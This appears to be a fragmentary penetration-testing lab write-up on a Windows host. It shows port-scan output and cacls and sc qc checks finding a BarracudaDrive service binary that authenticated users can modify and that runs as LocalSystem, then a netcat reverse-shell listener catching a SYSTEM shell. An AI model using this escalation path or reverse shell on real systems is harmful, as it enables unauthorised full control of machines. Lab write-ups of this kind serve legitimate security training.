[*] http found on tcp/45443. Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23 seems like 45332
[*] msrpc found on tcp/49664. [*] msrpc found on tcp/49665. [*] msrpc found on tcp/49666. [*] msrpc found on tcp/49667. [*] msrpc found on tcp/49668. [*] msrpc found on tcp/49669.
## Insecure Folder Permission C:\>cacls C:\bd C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
## Insecure File/Service Permission C:\>cacls C:\bd\bd.exe C:\bd\bd.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C
C:\>sc qc bd [SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\bd\bd.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BarracudaDrive ( bd ) service DEPENDENCIES : Tcpip SERVICE_START_NAME : LocalSystem
1 2 3 4 5 6 7 8 9 10 11
rlwrap nc -nvlp 443 listening on [any] 443 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.111.127] 49668 Microsoft Windows [Version 10.0.19042.1387] (c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> C:\WINDOWS\system32>whoami whoami nt authority\system